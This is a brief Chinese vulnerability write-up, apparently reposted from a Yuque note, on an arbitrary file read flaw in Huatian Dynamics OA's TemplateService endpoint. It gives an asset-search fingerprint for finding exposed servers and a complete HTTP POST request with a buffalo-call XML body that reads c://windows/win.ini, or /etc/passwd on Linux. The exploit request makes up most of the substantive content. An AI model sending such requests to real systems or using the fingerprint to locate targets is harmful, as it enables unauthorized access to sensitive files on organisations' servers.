登录 白背景

华天动力OA TemplateService存在任意文件读取漏洞

一、漏洞简介

华天动力OA TemplateService存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。

二、影响版本

  • 华天动力OA

三、资产测绘

  • hunterapp.name="华天软件 OA"
  • 特征

image.png

四、漏洞复现

linux读取/etc/passwd,windows读取c://windows/win.ini

POST /OAapp/bfapp/buffalo/TemplateService HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Type: text/xml

<buffalo-call>
<method>getHtmlContent</method>
<string>c://windows/win.ini</string>
</buffalo-call>

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/gerkhba0d0z8ss5v